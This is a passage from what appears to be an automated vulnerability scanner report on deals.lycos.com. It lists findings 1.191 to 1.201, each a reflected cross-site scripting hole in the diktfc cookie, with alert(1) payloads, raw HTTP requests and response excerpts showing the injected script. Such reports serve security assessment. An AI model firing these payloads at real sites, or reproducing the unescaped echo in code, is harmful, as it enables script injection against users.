="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A23774"><script>alert(1)</script>f4fd1e37b84&amp;cj=1" alt="tracker" />
...[SNIP]...

1.191. http://deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/kempler-and-strauss-watch-cell-phone-175-413939

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad3ea"><script>alert(1)</script>6be4c9f934a was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/kempler-and-strauss-watch-cell-phone-175-413939 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad3ea"><script>alert(1)</script>6be4c9f934a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:05 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad3ea"><script>alert(1)</script>6be4c9f934a&amp;cj=1" alt="tracker" />
...[SNIP]...

1.192. http://deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/kempler-and-strauss-watch-cell-phone-175-413939

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7814e"%3balert(1)//72d8244a306 was submitted in the diktfc cookie. This input was echoed as 7814e";alert(1)//72d8244a306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/kempler-and-strauss-watch-cell-phone-175-413939 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7814e"%3balert(1)//72d8244a306; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7814e";alert(1)//72d8244a306"
});
</script>
...[SNIP]...

1.193. http://deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39673"%3balert(1)//133a711edd1 was submitted in the diktfc cookie. This input was echoed as 39673";alert(1)//133a711edd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A39673"%3balert(1)//133a711edd1; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A39673";alert(1)//133a711edd1"
});
</script>
...[SNIP]...

1.194. http://deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e2d"><script>alert(1)</script>71fb8bc76fa was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A44e2d"><script>alert(1)</script>71fb8bc76fa; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A44e2d"><script>alert(1)</script>71fb8bc76fa&amp;cj=1" alt="tracker" />
...[SNIP]...

1.195. http://deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a01b2"%3balert(1)//174a20976d8 was submitted in the diktfc cookie. This input was echoed as a01b2";alert(1)//174a20976d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa01b2"%3balert(1)//174a20976d8; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa01b2";alert(1)//174a20976d8"
});
</script>
...[SNIP]...

1.196. http://deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63277"><script>alert(1)</script>b757cca267c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63277"><script>alert(1)</script>b757cca267c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63277"><script>alert(1)</script>b757cca267c&amp;cj=1" alt="tracker" />
...[SNIP]...

1.197. http://deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ee78"><script>alert(1)</script>a4a1fb5c58d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7ee78"><script>alert(1)</script>a4a1fb5c58d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7ee78"><script>alert(1)</script>a4a1fb5c58d&amp;cj=1" alt="tracker" />
...[SNIP]...

1.198. http://deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45c66"%3balert(1)//b6a939bc91 was submitted in the diktfc cookie. This input was echoed as 45c66";alert(1)//b6a939bc91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A45c66"%3balert(1)//b6a939bc91; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A45c66";alert(1)//b6a939bc91"
});
</script>
...[SNIP]...

1.199. http://deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55ae2"><script>alert(1)</script>ecb316bab89 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55ae2"><script>alert(1)</script>ecb316bab89; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55ae2"><script>alert(1)</script>ecb316bab89&amp;cj=1" alt="tracker" />
...[SNIP]...

1.200. http://deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55068"%3balert(1)//77d4c7afd2 was submitted in the diktfc cookie. This input was echoed as 55068";alert(1)//77d4c7afd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55068"%3balert(1)//77d4c7afd2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lenovo-core-i3-dual-2-4ghz-14-laptop-549-414298",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55068";alert(1)//77d4c7afd2"
});
</script>
...[SNIP]...

1.201. http://deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4fb5"%3balert(1)//cc77090642d was submitted in the diktfc cookie. This input was echoed as a4fb5";alert(1)//cc77090642d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
